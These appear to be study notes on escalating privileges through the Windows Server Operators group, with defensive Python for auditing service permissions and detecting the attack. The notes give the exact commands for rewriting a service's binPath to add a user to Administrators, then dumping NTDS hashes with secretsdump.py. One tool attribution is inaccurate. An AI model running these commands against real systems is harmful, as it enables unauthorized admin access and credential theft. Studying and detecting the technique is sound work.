Key Concepts:
Service Permissions:
The Server Operators group has SERVICE_ALL_ACCESS to many services. This allows its members to modify service configurations.
Service Modification:
The AppReadiness service is used as an example. The service's binary path (binPath) is modified to execute a command.
Privilege Escalation:
The modified service command adds the attacker's user to the local administrators group.
This results in full control over the machine.
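The permission check behind this technique can be automated from the defender's side. The following Python audit is an added example, not part of these notes or of any tool they mention: it parses the SDDL string that `sc sdshow <service>` prints (the same DACL that PsService displays) and reports every principal other than SYSTEM and Administrators that holds rights allowing the service's binPath or DACL to be rewritten. The SDDL value is constructed for the example; the right-code and trustee-alias tables are the standard SDDL mappings, with "SO" being BUILTIN\Server Operators (S-1-5-32-549).

```python
import re

# Service-specific and standard rights as they appear in service SDDL strings
# (the format printed by "sc sdshow <service>" and shown by PsService).
RIGHT_CODES = {
    "CC": ("SERVICE_QUERY_CONFIG", 0x0001),
    "DC": ("SERVICE_CHANGE_CONFIG", 0x0002),
    "LC": ("SERVICE_QUERY_STATUS", 0x0004),
    "SW": ("SERVICE_ENUMERATE_DEPENDENTS", 0x0008),
    "RP": ("SERVICE_START", 0x0010),
    "WP": ("SERVICE_STOP", 0x0020),
    "DT": ("SERVICE_PAUSE_CONTINUE", 0x0040),
    "LO": ("SERVICE_INTERROGATE", 0x0080),
    "CR": ("SERVICE_USER_DEFINED_CONTROL", 0x0100),
    "SD": ("DELETE", 0x10000),
    "RC": ("READ_CONTROL", 0x20000),
    "WD": ("WRITE_DAC", 0x40000),
    "WO": ("WRITE_OWNER", 0x80000),
    "GA": ("GENERIC_ALL", 0x10000000),
}

# Well-known SDDL trustee aliases. "SO" is BUILTIN\Server Operators (S-1-5-32-549).
TRUSTEE_ALIASES = {
    "SY": "NT AUTHORITY\\SYSTEM",
    "BA": "BUILTIN\\Administrators",
    "SO": "BUILTIN\\Server Operators",
    "IU": "NT AUTHORITY\\INTERACTIVE",
    "SU": "NT AUTHORITY\\SERVICE",
    "BU": "BUILTIN\\Users",
    "AU": "NT AUTHORITY\\Authenticated Users",
    "WD": "Everyone",
}

# Rights that let a principal rewrite binPath (or the DACL itself) and so take over the service.
ABUSABLE = {"SERVICE_CHANGE_CONFIG", "WRITE_DAC", "WRITE_OWNER", "GENERIC_ALL"}
EXPECTED_HOLDERS = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators"}

# (ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid)
ACE_RE = re.compile(r"\((?P<type>[A-Z]+);(?P<flags>[^;]*);(?P<rights>[^;]*);[^;]*;[^;]*;(?P<sid>[^)]+)\)")


def decode_rights(rights_field):
    """Turn an SDDL rights field (two-letter codes or a hex mask) into right names."""
    names = set()
    if rights_field.lower().startswith("0x"):
        mask = int(rights_field, 16)
        for name, bit in RIGHT_CODES.values():
            if mask & bit:
                names.add(name)
    else:
        for i in range(0, len(rights_field), 2):
            code = rights_field[i:i + 2]
            names.add(RIGHT_CODES.get(code, (code, 0))[0])
    return names


def parse_dacl(sddl):
    """Return [(trustee, ace_type, rights)] for the DACL part of an SDDL string."""
    if "D:" not in sddl:
        return []
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0]  # drop the SACL, if present
    aces = []
    for m in ACE_RE.finditer(dacl):
        sid = m.group("sid")
        aces.append((TRUSTEE_ALIASES.get(sid, sid), m.group("type"), decode_rights(m.group("rights"))))
    return aces


def audit_service(service, sddl):
    """List principals outside SYSTEM/Administrators that can reconfigure the service."""
    findings = []
    for trustee, ace_type, rights in parse_dacl(sddl):
        if ace_type != "A" or trustee in EXPECTED_HOLDERS:  # only Allow ACEs matter here
            continue
        held = sorted(rights & ABUSABLE)
        if held:
            findings.append({"service": service, "trustee": trustee, "rights": held,
                             "can_start": "SERVICE_START" in rights or "GENERIC_ALL" in rights})
    return findings


# Constructed sample: a default-looking service DACL plus an ACE granting Server Operators full access.
SAMPLE_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
               "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)"
               "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")

if __name__ == "__main__":
    for f in audit_service("AppReadiness", SAMPLE_SDDL):
        print(f"{f['service']}: {f['trustee']} holds {', '.join(f['rights'])}"
              f" (can start: {f['can_start']})")
```

Run it against real output by feeding `sc sdshow <service>` for each service name from `sc query`; a finding whose `can_start` is true is exactly the combination (change config plus start) that this page's walkthrough relies on, and is what the DACL should be tightened to remove.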
Approach, Commands, Tools, and Techniques:
Service Query:
sc qc AppReadiness (verify service details).
Service Permissions Check:
PsService.exe security AppReadiness (verify the Server Operators permissions on the service).
Local Administrators Check:
net localgroup Administrators (verify current group members).
Service Configuration Modification:
sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add" (modify the service binary path).
Service Start (Trigger):
sc start AppReadiness (start the service, triggering the command).
Local Administrators Verification:
net localgroup Administrators (verify the group addition succeeded).
Post-Exploitation:
crackmapexec smb <target_ip> -u <user> -p <password> (verify administrative access).
secretsdump.py <user>@<target_ip> -just-dc-user administrator (extract NTDS.dit hashes).
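Each step of the walkthrough above leaves a distinct trace on the host, and those traces are what a detection should key on. The following Python is an added example, not part of these notes: it runs three rules over flattened event records of the kind a Sysmon or Security-log export produces (one dict per event, field names as in the event XML; this record shape is an assumption). The rules are: a service's ImagePath value rewritten to something that launches a shell or net command (Sysmon Event 13, assuming registry SetValue logging covers HKLM\System\CurrentControlSet\Services), services.exe spawning a process whose command line adds a member to a local group (Sysmon Event 1), and a member added to the local Administrators group (Security 4732). The sample events are constructed and mirror the sequence on this page.

```python
import re

# Value written to a service's ImagePath that launches a shell or net command rather than a service binary.
IMAGEPATH_RE = re.compile(r"\\services\\([^\\]+)\\imagepath$", re.IGNORECASE)
SHELL_IN_VALUE_RE = re.compile(
    r"\b(cmd(\.exe)?\s+/[ck]|powershell|pwsh|net1?\s+(localgroup|group|user))\b", re.IGNORECASE)
# "net localgroup <group> <member> /add" in any form (net or net1).
LOCALGROUP_ADD_RE = re.compile(r"\bnet1?\s+localgroup\b.*\s/add\b", re.IGNORECASE)


def detect(events):
    """Return one alert dict per event that matches a rule; benign events produce nothing."""
    alerts = []
    for e in events:
        provider, eid = e.get("Provider"), e.get("EventID")
        if provider == "Sysmon" and eid == 13:  # registry value set
            m = IMAGEPATH_RE.search(e.get("TargetObject", ""))
            if m and SHELL_IN_VALUE_RE.search(e.get("Details", "")):
                alerts.append({"rule": "service_imagepath_set_to_shell", "service": m.group(1),
                               "value": e["Details"], "by": e.get("Image")})
        elif provider == "Sysmon" and eid == 1:  # process creation
            parent = e.get("ParentImage", "").lower()
            if parent.endswith("\\services.exe") and LOCALGROUP_ADD_RE.search(e.get("CommandLine", "")):
                alerts.append({"rule": "services_exe_spawned_localgroup_add",
                               "command": e["CommandLine"], "user": e.get("User")})
        elif provider == "Security" and eid == 4732:  # member added to a security-enabled local group
            if e.get("TargetUserName", "").lower() == "administrators":
                alerts.append({"rule": "local_administrators_member_added",
                               "member": e.get("MemberSid") or e.get("MemberName"),
                               "by": e.get("SubjectUserName")})
    return alerts


# Constructed sample events: the page's sequence plus two benign events that must not alert.
SAMPLE_EVENTS = [
    {"Provider": "Sysmon", "EventID": 13, "EventType": "SetValue",
     "Image": "C:\\Windows\\System32\\services.exe", "User": "NT AUTHORITY\\SYSTEM",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\AppReadiness\\ImagePath",
     "Details": "cmd /c net localgroup Administrators server_adm /add"},
    {"Provider": "Sysmon", "EventID": 13, "EventType": "SetValue",  # benign: installer fixing a real binary path
     "Image": "C:\\Windows\\System32\\msiexec.exe", "User": "NT AUTHORITY\\SYSTEM",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\Spooler\\ImagePath",
     "Details": "C:\\Windows\\System32\\spoolsv.exe"},
    {"Provider": "Sysmon", "EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd /c net localgroup Administrators server_adm /add",
     "ParentImage": "C:\\Windows\\System32\\services.exe", "User": "NT AUTHORITY\\SYSTEM"},
    {"Provider": "Sysmon", "EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe",  # benign: interactive shell
     "CommandLine": "cmd /c dir", "ParentImage": "C:\\Windows\\explorer.exe", "User": "LAB\\alice"},
    {"Provider": "Security", "EventID": 4732, "TargetUserName": "Administrators",
     "TargetDomainName": "Builtin", "MemberName": "-",
     "MemberSid": "S-1-5-21-1111111111-2222222222-3333333333-1104",  # constructed placeholder SID
     "SubjectUserName": "DC01$"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a)
```

The first rule fires at the sc config step, before the service is ever started, so it is the earliest point at which this sequence can be interrupted; the other two confirm execution and impact. In production the three alerts for one host within a short window would be correlated into a single high-confidence incident, which this example leaves to the SIEM.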
Commands:
sc qc
sc config
sc start
net localgroup Administrators
crackmapexec smb
secretsdump.py
Tools:
sc.exe (Windows built-in)
PsService.exe (Sysinternals)
crackmapexec (Impacket)
secretsdump.py (Impacket)
Techniques:
Abusing service permissions.
Modifying service configurations.
Adding users to local administrators group.
Post-exploitation using Impacket.
Key Considerations:
Service availability: The targeted service must exist on the host and be in a state that lets the account start it.
Permissions: The account must be a member of the Server Operators group.
Post-exploitation: Once administrative access is obtained, the usual post-exploitation tasks (such as the Impacket steps above) become available.